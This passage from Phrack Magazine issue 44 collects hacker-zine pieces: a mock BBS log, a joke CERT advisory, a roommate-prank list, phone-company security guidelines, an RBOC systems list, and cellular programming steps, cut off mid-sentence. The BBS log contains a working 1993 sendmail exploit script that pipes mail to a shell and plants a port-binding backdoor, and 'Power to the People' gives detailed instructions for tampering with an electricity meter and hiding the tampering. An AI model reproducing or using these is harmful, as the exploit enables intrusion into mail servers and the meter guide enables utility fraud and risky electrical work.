Sendmail bug is a bug that works using sendmail. This bug works on hosts using sendmail and can allow people to do things from remote through sendmail. I know the bug, but I'm not going to give it out. Forum Members can get it from the Database on CertNet. UnCERTian Future [A]uto reply [N] [R]e-read [Q]uit:N Number :) 225 From :) The BeanCounter Subject :) SENDMAIL ED: I DON'T HAVE ACCESS TO THE DATABASE ON CERTNET. COULD YOU SEND IT TO ME IN EMAIL? WHM [A]uto reply [N] [R]e-read [Q]uit:N Number :) 226 From :) Uncertian Future Subject :) Bill... Yes, you do. All Members of The Forum have access. I will call you and tell you how to access it. Remember, UNIX is case sensitive. If this is a problem, you will have to use another computer. UnCERTian Future Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 227 From :) Information Warrior Subject :) InterNuts I have been having a really dumb conversation on the net with a moron who wants to argue about HERF with ME! WITH ME! Can you believe it? I almost want to strangle the guy. Some college kid, but still... The new file is due out soon. I will place it in the upload section in .zip format. Someone will have to unzip it for Donn and Bill. I don't think they have figured that utility out yet. [A]uto reply [N] [R]e-read [Q]uit:N Number :) 228 From :) Hackman Subject :) Sendmail Bug. Dig it. You Forum people piss me off. Turn on your buffers everyone cuz here comes the bug. Fuck you if you don't like it. ------Cut Here-------- #!/bin/sh # Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com) # # This material is copyrighted by Scott Chasin, 1992, 1993. The # usual standard disclaimer applies, especially the fact that the # author is not liable for any damages caused by direct or indirect # use of the information or functionality provided by this program. # # Description: # # Exploit NEW sendmail hole and bind a port so we can spawn a program. # Not for distribution under any circumstances # # Usage: smail # default: smail <7001> port=$3 user=$2 cmd=$4 if [ -z "$2" ]; then user=daemon fi if [ -z "$3" ]; then port=7002 fi if [ -z "$4" ]; then cmd="/bin/csh -i" fi ( sleep 4 echo "helo" echo "mail from: |" echo "rcpt to: bounce" echo "data" echo "." sleep 3 echo "mail from: $user" echo "rcpt to: | sed '1,/^$/d' | sh" echo "data" echo "cat > /tmp/a.c < #include #include #include #include reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac; int **av;{struct sockaddr_in mya;struct servent *sp ;fd_set muf;int myfd,new,x,maxfd=getdtablesize(); signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM, 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr, sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp")) ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd, (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd, 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork() ==0){for(x=2;x Why did I take this job? L.O.S.T Girl Number :) 231 From :) American Eagle Subject :) That post How do you use that bug? I tried typing it in,but got a lot of errors. Is it for some special operating system? Or do you have to type it in on a special port? American Eagle Forum Of OverLordS [A]uto reply [N] [R]e-read [Q]uit:N Number :) 232 From :) Zen Subject :) New Program The new version of COPS is available for Download. Zero Day Ware! Get it fast. I will u/l updates/ bug fixes later... Gotta love all them filepoints! Off to play Xtank Zen Legion Of Security Types [A]uto reply [N] [R]e-read [Q]uit:N Number :) 234 From :) Spaf Master Subject :) !@!# Ur Pr0grA/\/\ 1z amUz1nG, But Un3l3eT Eye p0Ss3z 1 0F mUch gR3aTr aB1liTy thAt Th3 4-m w1lL Us3. Ch3Ck th3 DatAbaS3 0n CERT-NET. D3aTh 2 LOST --spaf Forum Of OverLordS Number :) 235 From :) Sysop Subject :) WARNING! Someone has given out the NUP. Some cracker type has attempted to access the bbs as of last night. I will call UnCERTain Future to put out an advisory on this issue. Please do not give out the NUP to anyone. THIS IS A PRIVATE BBS! [A]uto reply [N] [R]e-read [Q]uit:N End of Messages [A]uto reply [N] [R]e-read [Q]uit:Q ******************************************************************************* ============================================================================= CA-93:16 CERT Advisory October 23, 1993 Hacker/Cracker Vulnerabilities ----------------------------------------------------------------------------- The CERT Coordination Center has learned of several vulnerabilities in the language used on the USENET system. This vulnerability affects all users running rn, tin or other USENET news readers as well as users holding discussions containing the words "hacker" or "cracker". Patches can be obtained from your local phrack archive as well as through anonymous FTP to they ftp.netsys.com (192.215.1.2) system. Information concerning specific patches is outlined below. Please note that phrack sometimes updates patch files. If you find that the checksum is different, please contact phrack. ----------------------------------------------------------------------------- I. Hack and Crack Vulnerabilities These vulnerabilities affect all systems running a USENET news- reader including rn and tin, as well as all conversations, papers and stories involving the words "Cracker" and/or "Hacker". ** This vulnerability is being actively exploited and we strongly recommend that sites take immediate and corrective action. ** A. Description A vulnerability exists in the words "Hacker" and "Cracker" such that users may become confused as to exactly who/what you are talking about when used in a sentence. B. Impact Unauthorized confusion to affected conversations may ensue. C. Solution We recommend that all affected sites take the following steps to secure their systems. 1. Obtain and install the appropriate patch following the instructions included with the patch. System Patch ID Filename Checksum ------ -------- --------------- --------- all 10288 10288.tar.Z 5551 212 The checksums shown above are from the BSD-based checksum. 2. If your conversation is found to have been compromised by the word "Hacker" or "Cracker", we recommend you flame all parties involved and immediately break up the discussion by talking about the "correct" meaning of the words. 3. Depending upon the sensitivity of the information contained in your conversation, you may wish to replace the existing conversation with one discussing (a) the NSA, (b) the BATF (c) The Kennedy Assasination, (d) why shadowing password schemes are helpful or hurtful or (e) which file editor is actually the best. --------------------------------------------------------------------------- The CERT Coordination Center wishes to thank the Rogue Agent, (Rogue Agent/ SoD!/TOS/KoX), the letter 'Q' and the number '55' for reporting these vulnerabilities and Phrack, Inc. for their response to these problems. --------------------------------------------------------------------------- If you believe that your system has been compromised, contact the CERT Coordination Center or your representative in FIRST (Forum of Incident Response and Security Teams). Internet E-mail: cert@cert.org Telephone: 412-268-7090 (24-hour hotline) CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4), and are on call for emergencies during other hours. CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Past advisories, information about FIRST representatives, and other information related to computer security are available for anonymous FTP from cert.org (192.88.209.5). ******************************************************************************* [** NOTE: The following file is presented for informational and entertainment purposes only. Phrack Magazine takes NO responsibility for anyone who attempts the actions described within. **] Power to the People A little theory to get you started: Watts=Current * Voltage A power meter consists of a voltage coil, a current coil, a small motor to drive the dials, and little else. Given the formula above, if we can somehow cut down the voltage that the meter 'sees', then we can reduce the number of watts that it measures. If we cut our voltage in 1/2, our watts also get cut in half. Fortunately, your meter doesn't read the voltage directly off of the lines into your house. Two small wires lead to the voltage coil within the meter. Simple modification to this circuit is all that is needed. Inserting a resistor in series with the voltage coil will cut the voltage that the meter sees, and therefore that wattage that it reads. Meters read Kilowatts per hour, and you pay so much for each kilowatt. Since the hours remain constant (unless your stuck in one of those nasty little dimensional time warps..and I really hate it when that happens), your bill is directly related to what resistor value you insert. Do this correctly, and carefully, you will save a bundle on the power you use. Say I cut my bill by $40 per month..$40 * 12 months = $480 saved with a original 'investment' of $5 that is a 96 fold return on your investment. This idea also might be used to provide a service to your trusted friends, $100 bux a mod or so..$$$ One last little caution before you begin, don't go messing around with the adjustment screws you will find, usually there are 2 of them with F & S marked near them. I had the foolish idea to mess with these, the result is when I am drawing very little power (a few watts) my meter will slowly run backwards. Next time I'm modifying it, I'll have to fix that. Mr. Meter Reader would really wonder what the heck was going on when he saw that. (Mr. Meter Reader will be thinking he's done far to many drugs on the weekend..or needs to be.) SUPPLIES NEEDED: (2) Power meters. You'll perform the mod on one, and use the other to have in while you're doing it. (1) Length of heat shrink tubing, a sufficient size to cover a half watt resistor. (Some) half-watt resistors, 10k-25k or so. (A 10K resistor will cut your bill in half...15K quit a bit more (the amount saved, is NOT linear to the resistor value..more like a logarithmic scale) (some) Good old 100% silicon caulk Soldering iron, solder, lots of nerve. To begin the Mod: Take the little 'lock' they use (little plastic deal), and chuck it. Wait about 2 months for the reader to get used to the fact it's gone..the idea is that if they think you've tampered with it cause the lock is gone..they will check and find no tampering then..(least that's the idea) If you happen to know someone who works for the power company, and can get your hands on some of those locks, get a few new ones, and let them 'age' outside for a few months (to get that used look), then replace yours with it when done. And if anyone happens to know of a source for these locks, I would appreciate knowing. You'll need to 'find/get/steal/snag/etc' another meter to put in while your fixing your..(kinda hard to see/solder with no power) ;) Lift the now unlocked cover and pull meter out..(simply pulls out of the socket real easy) put other meter in for a while..(do at night would be a good idea..neighbors would wonder what the heck you were doing eh?) On the side of the meter, there will be a little (probably copper), pin, that is designed to break when you unbend the end of it..(security device). Be real careful and try not to break it when you bend it back (if it breaks, save the piece that broke off) Pull that out, and then turn the ring that holds the unit together..it should then come apart real easy. Between the assembly where the wheel is and the base plate, look in the gap, there should be a black deal that looks like a transformer attached to the core of the meter and 2 black wires leading from the prongs of the meter base to the smaller coil. This is the voltage coil. Here comes the fun part! Cut one of the wires, being sure you cut where you can hide the damage later. Solder in 10k or 15k resistor with the leads of resistor cut off right at resistor body, and also put the heat shrink tubing on the resistor, and shrink it..(with heat preferably) ;) Take silicone rubber (the 100% pure stuff..) and glue the resistor and the shrunk tubing over it underneath the top assembly. Make it appear that the wires simply curve up that way and nothing more. Put ring back on. Notice that you must put the meter together exactly the way it came apart. Example: on mine, i noticed that there was dirt on the bottom from rain splashing mud onto the meter. It would look kinda obvious if the mud suddenly appeared on top of the meter. Take the little pin that you removed (copper thing) and replace it in the hole and through the ring as before. Bend the end back up like before also if it broke, bend what is left anyways, there should be plenty left to bend. Take the broken end (if it broke), and jam it under the end of the bend to make it look legit. If they do pull the meter to inspect, they will hopefully just think that it might have broke loose when it was installed. I have noticed on some unmodified meters that I 'found' that the security pin has been broken already. So It's reasonable safe to assume that they don't take much faith in them. When done, you should NOT be able to tell if any mods have been done by looking. Be sure it's undetectable, they get kinda mad when you do things like this for some odd reason. It's suggested that after the modification, you have a friend, who you trust not to fink, take a very close look to see if they can spot any mods. Your bill should drop in half or more..if you really want to drop the bill..do this in steps.. a few months apart..so they won't notice that your bill is dropping like a rock. Just don't get silly. Using only 1kwh per month just yells fraud. Mine went from $80-$90 a month to around $30-$37 month with a 10K resistor (I added a electric dryer and other items during that month also.) You might want to try this a few times on other meters you've 'found' just to get the nack of it first, it should work with all meters. At least the ones they use in my area. Table of comparisons: test made using 1320 watt electric heater. 120V 11 amps 1.3 KWH resistor value rev per time voltage cross resistor rev/hour ------------------------------------------------------------------------------ 0 1 rev/23 seconds 0 156 1k 1 rev/24 seconds 9. 150 10K 1 rev/42 seconds 63 85 12k 1 rev/53 seconds 68 39K 1 rev/464 seconds ??? 7.25 Notice the 39K resistor's performance, NOT a good choice to use, it will cut your bill to 4% of the original. They will wonder about this. I'm currently using 10K which will cut it to approx 54% of the original bill. My bill is around 1/2 previous. Saving me approx $30-$50 a month in power bills. Not bad for a 10 cent resistor. Keep in mine the wattage rating of the resistor. Measure the voltage across the resistor. Take that number divide it by the resistor your using to get current. Take the current times current (square it), and multiply this by resistance value to get the wattage of resistor that is required. After all, it would not be a good thing for the resistor to go up in smoke. Mr. Meter Reader would wonder why you used 0 kwh this month. There also is another method that in theory will make your power bill less, this is called 'power factor correction', but unfortunately requires the use of some rather large (read expensive) AC cap's. For this reason (and the fact it cost under $5 and provides more of a benefit), the method of using the resistor is more useful and do-able by the everyone (especially those who despise the 'system'). Notice that I have NOT left a email address or the like for correspondence, namely due to the fact that this is highly illegal and greatly frowned upon by the authorities. If anyone has a need to contact me they may do so via phrack magazine, they can forward mail to me. If you do this modification correctly and per instructions, you will indeed save money. Have fun, be careful, and challenge the system at every turn. ******************************************************************************* DATA BANK OF THE GERMAN SPEAKING AN-ARCHISM The Da.d.A. Project DAtenbank des Deutschsprachigen Anarchismus Berlin, Koln The history of the liberative movement has not yet been filed sufficiently. That is, mainly, due to the lack of scientists with interest in exploring this area. Thanks to that, people who need bibliographic information for some specific themes of the history of anarchism, must go through all direct sources and derive from those some conclusions. Things are more difficult in case modern literature is required, for the theory and practice of liberative movements, which have appeared in the meantime. The data bank of the German speaking anarchism (DAtenbank des Deutschsprachigen Anarchismus) is trying to cover the lack of bibliographic material. Currently it files anarchistic or, generally, liberative documents and publishes. Later it will comprehend documents which deal with the history and theory of those movements. We are focusing our compilation activities, to the German speaking areas with plans of enhancing that shortly. In parallel we are elaborating an introduction to the publishing history of the printed material, which will be informative for their political and editorial meanings. From the early 1980's, the filing of the German liberative press is open for exploration. It covers the chronological period from the philosophic commencements of the German anarchism, in the 1832, until nowadays. Strength of expression is given to newspapers and magazines, though collections of documents, almanacs, year-books, congresses' protocols and catalogs are not omitted. Except of the anarchistic publishes we are also registering material whose cooperatives or publishers were anarchists. The filing is achieved using all the usual bibliographical criterion (titles, publishers, date/district, circulation, place of distribution et cetera). In order to handle the increasing demands of the people who would like to access our material, we decided to publish our first synthetic registers in a series of brochures. This publication, in restricted copies and four or five continuations, will be available at the "File of Social and Civilization History" of the 'Libertad' publications in Berlin. The first brochure, is occupied with the German liberative press from 1832 to 1890. Every copy of this serial includes a diagram of the press' history, chronological bibliography of the magazines and an index. We resume special researches through the data bank and we offer the results printed. Until now we have filed over 1000 titles, which offer many different elements for research each. Da.d.A. is a private, research project. We do not accept donations from state institutions and other similar organizations. In that way we can continue our efforts undistracted and independent. The disadvantage is that we support Da.d.A. with personal expenses and when we have free time available. The modern liberative press is difficult to register and get filed. Although liberative publications were developed in an unprecedented way (and not only arithmetically) after 1968, few publications are accessible from libraries and files. Especially today we must tune up our practises in order to protect modern press. We encourage every publisher of anarchistic material, even if productions are ceased nowadays, to send us information and, if possible, a copy of their publications. They will get registered in our computer and filed in the library for the Research of Social Demands, in order to be accessible for studies in the future. For more information about the Da.d.A. project and the possibilities of using the data bank, you can contact us in the following addresses: BERLINER GESELLSCHAFT ZUM STUDIUM SOZIALER FRAGEN e.V. Projekt: Datenbank des Deutschsprachigen Anarchismus (Da.d.A.) c/o Jochen Schmuck c/o Gunter Hoering Postfach 440 349 Pfalzer Str.27 1000 BERLIN 44 5000 KOLN 1 Tel. 030/686 65 24 Tel. 0221/21 81 49 ******************************************************************************* [Don't ask me why I'm printing this. I just think it's funny as hell.] 100 WAYS TO FREAK OUT YOUR ROOMMATE 1. Smoke jimson weed. Do whatever comes naturally. 2. Switch the sheets on your beds while s/he is at class. 3. Twitch a lot. 4. Pretend to talk while pretending to be asleep. 5. Steal a fishtank. Fill it with beer and dump sardines in it. Talk to them. 6. Become a subgenius. 7. Inject his/her twinkies with a mixture of Dexatrim and MSG. 8. Learn to levitate. While your roommate is looking away, float up out of your seat. When s/he turns to look, fall back down and grin. 9. Speak in tongues. 10. Move you roommate's personal effects around. Start out subtle. Gradually work up to big things, and eventually glue everything s/he owns to the ceiling. 11. Walk and talk backwards. 12. Spend all your money on Jolt Cola. Drink it all. Stack the cans in the middle of your room. Number them. 13. Spend all your money on Transformers. Play with them at night. If your roommate says anything, tell him/her with a straight face, "They're more than meets the eye." 14. Recite entire movie scripts (e.g. "The Road Warrior," "Repo Man," Casablanca,") almost inaudibly. 15. Kill roaches with a monkey wrench while playing Wagnerian arias on a kazoo. If your roommate complains, explain that it is for your performance art class (or hit him/her with the wrench). 16. Collect all your urine in a small jug. 17. Chain yourself to your roommate's bed. Get him/her to bring you food. 18. Get a computer. Leave it on when you are not using it. Turn it off when you are. 19. Ask your roommate if your family can move in "just for a couple of weeks." 20. Buy as many back issues of Field and Stream as you can. Pretend to masturbate while reading them. 21. Fake a heart attack. When your roommate gets the paramedics to come, pretend nothing happened. 22. Eat glass. 23. Smoke ballpoint pens. 24. Smile. All the time. 25. Collect dog shit in baby food jars. Sort them according to what you think the dog ate. 26. Burn all your waste paper while eying your roommate suspiciously. 27. Hide a bunch of potato chips and Ho Hos in the bottom of a trash can. When you get hungry, root around in the trash. Find the food, and eat it. If your roommate empties the trash before you get hungry, demand that s/he reimburse you. 28. Leave a declaration of war on your roommate's desk. Include a list of grievances. 29. Paste boogers on the windows in occult patterns. 30. Shoot rubber bands at your roommate while his/her back is turned, and then look away quickly. 31. Dye all your underwear lime green. 32. Spill a lot of beer on his/her bed. Swim. 33. Bye three loaves of stale bread. Grow mold in the closet. 34. Hide your underwear and socks in your roommate's closet. Accuse him/her of stealing it. 35. Remove your door. Ship it to your roommate's parents (postage due). 36. Pray to Azazoth or Zoroaster. Sacrifice something nasty. 37. Whenever your roommate walks in, wait one minute and then stand up. Announce that you are going to take a shower. Do so. Keep this up for three weeks. 38. Array thirteen toothbrushes of different colors on your dresser. Refuse to discuss them. 39. Paint your half of the room black. Or paisley. 40. Whenever he/she is about to fall asleep, ask questions that start with "Didja ever wonder why...." Be creative. 41. Shave one eyebrow. 42. Put your mattress underneath your bed. Sleep down under there and pile your dirty clothes on the empty bedframe. If your roommate comments, mutter "Gotta save space," twenty times while twitching violently. 43. Put horseradish in your shoes. 44. Shelve all your books with the spines facing the wall. Complain loudly that you can never find the book that you want. 45. Always flush the toilet three times. 46. Subsist entirely on pickles for a week. Vomit often. 47. Buy a copy of Frankie Yankovic's "Pennsylvania Polka," and play it at least 6 hours a day. If your roommate complains, explain that it's an assignment for your primitive cultures class. 48. Give him/her an allowance. 49. Listen to radio static. 50. Open your window shades before you go to sleep each night. Close them as soon as you wake up. 51. Cry a lot. 52. Send secret admirer notes on your roommate's blitzmail. 53. Clip your fingernails and toenails and keep them in a baggie. Leave the baggie near your computer and snack from it while studying. If he/she walks by, grab the bag close and eye him/her suspiciously. 54. Paste used kleenexes to his/her walls. 55. Whenever your roomate comes in from the shower, lower your eyes and giggle to yourself. 56. If you get in before your roomate, go to sleep in his/her bed. 57. Put pornos under his/her bed. Whenever someone comes to visit your roommate when they're not home, show them the magazines. 58. Whenever you go to sleep, start jumping on your bed . . . do so for a while, then jump really high and act like you hit your head on the ceiling. Crumple onto your bed and fake like you were knocked out . . . use this method to fall asleep every night for a month. 59. If your roommate goes away for a weekend, change the locks. 60. Whenever his/her parents call and ask for your roommate, breathe into the phone for 5 seconds then hang up. 61. Whenever he/she goes to shower, drop whatever you're doing, grab a towel, and go shower too. 62. Find out your roommate's post office box code. Open it and take his/her mail. Do this for one month. After that, send the mail to him/her by UPS. 63. Collect all of your pencil shavings and sprinkle them on the floor. 64. Create an imaginary cat for a pet. Talk to it every night, act like you're holding it, keep a litter box under your desk. After two weeks, say that your cat is missing. Put up signs in your dorm, blame your roommate. 65. Call safety & security whenever your roommate turns up his/her music. 66. Follow him/her around on weekends. 67. Sit on the floor and talk to the wall. 68. Whenever the phone rings, get up and answer the door. 69. Whenever someone knocks, answer the phone. 70. Take his/her underwear. Wear it. 71. Whenever your roommate is walking through the room, bump into him/her. 72. Stare at your roommate for five minutes out of every hour. Don't say anything, just stare. 73. Tell your roommate that someone called and said that it was really important but you can't remember who it was. 74. Let mice loose in his/her room. 75. Give each of your walls a different name. Whenever you can't answer a problem, ask each of your walls. Write down their responses, then ask your ceiling for the final answer. Complain to your roommate that you don't trust your ceiling. 76. Take your roommate's papers and hand them in as your own. 77. Skip to the bathroom. 78. Take all of your roommate's furniture and build a fort. Guard the fort for an entire weekend. 79. Gather up a garbage bag full of leaves and throw them in a pile in his/her room. Jump in them. Comment about the beautiful foliage. 80. When you walk into your room, turn off your lights. Turn them on when you leave. 81. Print up satanic signs and leave them in your room where he/she can find them. 82. Whenever you're on the phone and he/she walks in, hang up immediately without saying anything and crawl under your desk. Sit there for two minutes than call whoever it was back. 83. Insist on writing the entire lyrics to American Pie on your ceiling above your bed. Sing them every night before you go to bed. 84. Use a bible as Kleenex. Yell at your roommate if they say Jesus or God Damnit. 85. Burn incense. 86. Eat moths. 87. Buy Sea Monkeys and grow them. Name one after your roommate. Announce the next day that it died. Name another one after your roommate. The next day say that it died. Keep this up until they all die. 88. Collect Chia-Pets. 89. Refuse to communicate in anything but sign language. 90. Eat a bag of marshmallows before you go to bed. The next day, spray three bottles of whipped cream all over your floor. Say you got sick. 91. Wipe deodorant all over your roommate's walls. 92. If you know that he/she is in the room, come barging in out of breath. Ask if they saw a fat bald naked Tibetan man run through carrying a hundred dollar bill. Run back out swearing. 93. Leave apple cores on his/her bed. 94. Keep feces in your fridge. Complain that there is never anything to eat. 95. Piss in a jar and leave it by your bed. When your roommate isn't looking, replace it with a jar of apple juice. Wait until your roommate turns around. Drink it. 96. Don't ever flush. 97. Buy an inflatable doll. Sleep with it. 98. Hang stuffed animals with nooses from your ceiling. Whenever you walk by them mutter, "You shouldn't have done that to me." 99. Lick him/her while they are asleep. 100. Dress in drag. ******************************************************************************* ==Phrack Magazine== Volume Four, Issue Forty-Four, File 4 of 27 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ****************************************************************************** SOUTHWESTERN BELL TELEPHONE Computer Security Guidelines Computer Security is YOUR Responsibility. These guidelines are designed to help you know and meet your corporate obligation. Prepared by: Information Systems Computer Security Administration One Bell Center 22-H-8 St. Louis, MO 63101 For Users --------- Keep your logon and password information private. Do not write down passwords, but if you must, keep them in a locked place. Do not store your password in the computer. Make sure no on sees you enter your passwords. Pick non-obvious, non-guessable passwords. Do not share your logons or passwords. Change passwords periodically, at least every thirty days. Open new computer logons for computer resources only when you have a real need. Close computer logons you no longer need. Make sure you have proper protection settings on sensitive computer files. Do not send confidential information through electronic mail or computer news systems. If you suspect security violations, tell management immediately. Be sure that use of computing resources is for company approved purposes only. Do not access any information that your management has not authorized you to have. When in doubt, ask! Logoff when you leave your terminal. If you dialed in, disconnect when you are finished working. For Managers of Computing Facilities ------------------------------------ Provide procedures to control access to computing resources. Provide facilities to let users protect proprietary information from disclosure to unauthorized persons. Be sure that connection of a computer to any network does not diminish the control a user has over programs and data. Provide appropriate security facilities and procedures to protect computing hardware against damage. Provide facilities to protect user's data and programs from undesired changes or destruction. Ensure that computing resource use has been authorized by a member of supervision. Make sure that computing resource use can be tracked to individuals. Report to managers regularly on the extent of computing resource use. Provide appropriate backup facilities for data and programs. Provide audit trails which identify violations and security breaches and examine them regularly. For assistance in coordinating computer security activities, contact the Computer Security Administrator. For Managers ------------ Make sure you authorize all use of computing resources and that you require separate logons for each individual. Make sure that the user of computer resources understands responsibilities with respect to proper use and security consciousness. Review computing resource usage reports and the security practices of the users for which you are responsible. When a user's employment or need for access ends or changes, make sure access to computer resources is promptly changed by notifying your System Administrator. Report security violations to the General Security Manager and to the Computer Security Administration Group. For Information --------------- The Information Systems Organization provides security and disaster recovery services to establish, monitor, and audit computer security standards. If you have any comments or questions regarding computer security, please contact the Computer Security Administration. ******************************************************************************* RBOC ORGANIZATIONAL ARCHITECTURE Compiled By Phrack Magazine In an effort to assist the hacking world in their understanding of the organizational mess created by our fabulous friends at the RBOCs, we have compiled a list of the various organizations, what their functions are, which centers they are made up of, and which computer systems they use. ----------------------------------------------------------------------------- Planning and Engineering Defines network resources available for assignment Functions: Long range and current planning for outside plant, wire centers, interoffice network, special services, interexchange access services, and message trunks Exchange network design Coordination of activities connected with installation and/or modification of exchange network components Centers: DSPC SCPC WCFPC CAC IFFPC IFCPC TEC MEC DSDC EEC CSEC Systems: LEIS NPS FEPS LSRP INPLANS INFORMS DFDS SSFS PICS LATIS CAMIS CUCRIT ----------------------------------------------------------------------------- Service Provisioning Allocates assignable existing network resources Functions: Circuit design and routing Verification and assignment of network elements Controlling and tracking orders during assignment process Centers: CPC - Circuit Provisioning Center LAC - Loop Assignment Center Systems: TIRKS SOAC SWITCH COSMOS WM LFACS LOMS ----------------------------------------------------------------------------- Network Operations Controls installation, maintenance and testing of circuits Functions: Coordination and performance of the activities required to provide service Surveillance and control of network equipment and facilities Analysis, sectionalization, and repair of switching and transmission facilities Status reporting on service order and/or service restoration activities Centers: CRSAB ICC MC NAC RCMAC SEAC SSC FMAC STC DNCC FCC SCC Systems: McTE GDS LMOS EADAS TAN RSA CRAS CIMAP NDS SEAS MAS MIZAR SARTS TCAS CAROT NMA NMPS SCCS ----------------------------------------------------------------------------- Customer Services Direct company contact with customers Functions: Service negotiation with customers Creating and routing associated service orders Creating and maintaining customer records Reporting the provisioning status to customers Initiating billing and collection processes Handling billing and general service inquiries Centers: RSC - Residence Service Center BSC - Business Service Center ICSC - Interexchange Carrier Service Center Systems: BOFADS - Business Office Force Administration Data System PREMIS - Premises Information System SOP - Service Order Processor CABS - Carrier Access Billing System BOSS - Billing and Order Support System CRIS - Customer Records Information System BRIS - Business Revenue Information System CLAIMS ----------------------------------------------------------------------------- Quick Breakdown Process Center System ----------------------------------------------------------------------------- Planning & Engineering IOF IFCPC IFFPC IOF/EDC FEPS NPS-F Switch SCPC WCPC EEC LSD&F LSRP NDS TNDS/EQ NPS-W Distribution DSPC DSDC LATIS LEIS NPS-D Service Provisioning IOF CAC TIRKS Switch LAC COSMOS Distribution LAC LFACS Network Operations IOF FMAC CAROT CIMAP TCAS TNDS/TK Switch NAC RCMAC SCC EADAS NDS MAS MIZAR TASC CIMAP NMA NMPS SCCS Distribution ICC MC GDS CRAS LMOS/MLT PREDICTOR TAN ******************************************************************************* -IS- Blue Boxing Dead? Australia Direct 800-682-2878 Austria Direct 800-624-0043 Belgium Direct 800-472-0032 Belize Direct 800-235-1154 Bermuda Direct 800-232-2067 Brazil Direct 800-344-1055 British VI Direct 800-248-6585 Cayman Direct 800-852-3653 Chile Direct 800-552-0056 China Direct 800-532-4462 Costa Rica Direct 800-252-5114 Denmark Direct 800-762-0045 El Salvador Direct 800-422-2425 Finland Direct 800-232-0358 France Direct 800-537-2623 Germany Direct 800-292-0049 Greece Direct 800-443-5527 Guam Direct 800-367-4826 HK Direct 800-992-2323 Hungary Direct 800-352-9469 Indonesia Direct 800-242-4757 Ireland Direct 800-562-6262 Italy Direct 800-543-7662 Japan Direct 800-543-0051 Korea Direct 800-822-8256 Macau Direct 800-622-2821 Malasia Direct 800-772-7369 Netherlands Direct 800-432-0031 Norway Direct 800-292-0047 New Zealand Direct 800-248-0064 Portugal Direct 800-822-2776 Panama Direct 800-872-6106 Philippines Direct 800-336-7445 Singapore Direct 800-822-6588 Spain Direct 800-247-7246 Sweden Direct 800-345-0046 Taiwan Direct 800-626-0979 Thailand Direct 800-342-0066 Turkey Direct 800-828-2646 UK Direct 800-445-5667 Uruguay Direct 800-245-8411 Yugoslavia Direct 800-367-9841 / 9842 This file brought to you by The Phone Company ******************************************************************************* ***************************************** * Step-by-step Programming Instructions * * For the EO Cellular Module * ***************************************** 1. Unbox and attach the EO Cellular Module to the EO Personal Communicator 440/880. 2. Once the EO Cellular Module is attached turn on the EO Personal Communicator 440/880. 3. Open EO Phone. 4. Tap "Options." 5. Tap "Authorized Dealer." 6. Write Dealer Code in space provided. Dealer code is *12345678#. To edit mistakes, draw a small circle around 2 or 3 of the numbers entered. This will bring up an edit box and allow easier entry of the number. Once you have made your corrections, tap "OK." 7. Tap "OK" on the "Authorized Dealer Code" pop-up. 8. Wait approx. 30 seconds and programming screen will appear (The "busy clock" will appear on screen). 9. If invalid code entry screen appears, the programming screen will be blank and the "Apply" and "Apply and Close" buttons at the bottom will be greyed out. Close the programming screen by tapping on the upper left blacked out corner of the screen. Re-do steps 4 through 7 (refer to the TIP below for a guaranteed method of accurate entry). A common problem is to enter an "l" instead of a "1" because they appear to be very similar. To make sure that you have entered a one, check to see that the character is the same height as the other numbers. The letter "l" will be slightly taller. TIP: To insure that you have entered the correct digits (one versus letter "l" problem above) you can use the accessories keyboard. To use the keyboard for the Dealer Code entry do the following (replaces steps 4, 5, and 6 above): a. Tap Accessories in the lower bookshelf. b. Tap Keyboard. This will bring up the pop-up keyboard. c. Tap Options at the top of the EO Phone window. d. Tap Authorized Dealer. This will bring up the Dealer Code pop-up. e. Tap on the line in the Dealer Code box. A dot (or character) will appear and now entry from the keyboard will appear in the Dealer Code box. f. Now use the keyboard to delete the dot (or character). The Delete key is the upper right most key on the keyboard. g. Now use the keyboard to enter the dealer code - *12345678# (the * and the # keys can be found by tapping the shift (up arrow) keys.) h. GO TO STEP 7 and continue. NOTE: When programming the following entries always use the circle gesture to change the entry. In other words, circle the existing entry to bring up the edit combs. Then correct each digit by writing over the existing digit. This will insure that the number of digits for each entry is correct. If an entry has an incorrect length then none of the programed entries will be accepted. 10. Enter the assigned telephone number in the first field. Use the circle gesture to bring up the edit combs to edit the existing telephone number. Change each digit by writing over it in the edit combs. When complete tap "OK." 11. Use the same procedure in step 10 to enter the appropriate SID in the second field. 12. Use the same procedure in step 10 to enter the corresponding IPCH (0333 for the non-Wireline or A side provider; 0334 for the Wireline or B side provider) in the third field. 13. Leave the remaining fields intact as already programed from the factory unless instructed to change them by the cellular service provider. Use the circle/edit method to change any necessary entries. The factory defaults are: Field Title Default Value ----------- ------------- ACCOLC 00 Group ID 15 Lock Code 1234 SCM 1010 Security Code 123456 Emergency Code 911 14. Tap the "Apply" button on the bottom of the screen. The programming information you have entered is now being saved in the EO Cellular Module. This will take approximately 20 seconds. 15. Close the programming screen by tapping the blackened area in the upper left hand corner of the programming screen. 16. Now set the approximate Roaming Option. 17. Tap Options. 18. Tap Roaming. 19. Enter Security Code. Default is 123456. 20. Tap "OK." 21. Tap next to appropriate roaming option. A check mark will appear. 22. Tap "Apply" button. 23. Close window. 24. Check status line in EO Phone for appropriate indications. 25. Tap "Keypad" tab on right side of EO Phone window. This will bring up a keypad display which can be used to place a voice call. 26. Make sure that the Cellular Icon is boxed (as opposed to the Phone Icon in the lower left hand of EO Phone.) 27. Tap the keypad buttons to enter the number to be dialed. The digits will appear in the dial box at the middle bottom of the EO Phone window. 28. Pick up the handset and tap "DIAL" button in the lower right hand corner of the screen. This button is just like hitting 